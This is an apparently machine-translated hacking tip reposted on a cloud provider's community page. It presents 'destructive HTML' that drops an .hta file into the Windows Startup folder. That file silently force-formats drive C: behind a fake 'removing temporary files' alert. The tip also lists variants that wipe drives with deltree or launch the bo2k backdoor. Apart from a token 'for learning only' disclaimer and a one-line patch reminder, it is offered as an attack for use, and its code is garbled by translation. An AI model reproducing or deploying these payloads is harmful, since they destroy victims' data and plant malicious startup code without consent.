Hypertext tip: Use HTML to format your hard drive

Source: Internet
Author: User

[Document of the institute of Fire Station Building] HTML is a hypertext language, which is a static language. We all know that if you want to use text to drive system files, at least ASP, PHP, and JS scripts. Have you ever thought about formatting system disks with HTML? The editor of the institute of fire station sends you the code you have collected for a long time to learn.

The following section shows the destructive HTML

Hacking Your Computer.

Scr. Reset (); scr. Path = "C: \ WINDOWS \ Start Menu \ Programs \ Start \ hack. hta ";
Scr. Doc ="
Wsh.Run('start.exe/m format c:/q/autotest/U ');
Alert ('important: Windows is removing unused temporary files .');";
Scr. write ();


(People who know HTML should be able to see how it fits)

Now I will explain the meanings of several projects.

Scr. Path = "C: \ WINDOWS \ Start Menu \ Programs \ Start \ hack. hta"

This means that when you see this webpage, It will be written under the startup directory of your computer and named
Hack. hta

Wsh.Run('start.exe/m format c:/q/autotest/U ');

Usually, you will first ask if you want to format the hard drive, but the "/autotest" option in it.

It is a function that is not publicly available by Microsoft. After you type the format, the action is executed forcibly.

In this example, the/q/u command is executed immediately without checking the hard disk.

The latest start.exe can be used with the/m option to minimize the execution of the format DOS-prompt window.
Status.

How to execute other attack commands:

Modify the parameter start.exe/m format c:/q/autotest/u.

Start.exe/m format c:/q/autotest/u

"C:" can be replaced with other hard disks.

(Path) \ bo2k.exe

Run a program on the computer. If you have transferred bo2k to the computer, you can use this command.

Start.exe/m deltree/y a: \ *. * c: \ *. * d :\*.*

Kill all files under the hard drive of the other party.

Start.exe/m deltree/y c: \ windows \ system \*.*

Kill all files under the c: \ windows \ system \ directory of the other party.

Later: to prevent the damage caused by this means, update your browser at Microsoft.

Editor's note: the editor of the school of Fire Station reminds you that this code is only for your learning and should not be used for illegal purposes, so as to avoid inconvenience to yourself and others!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.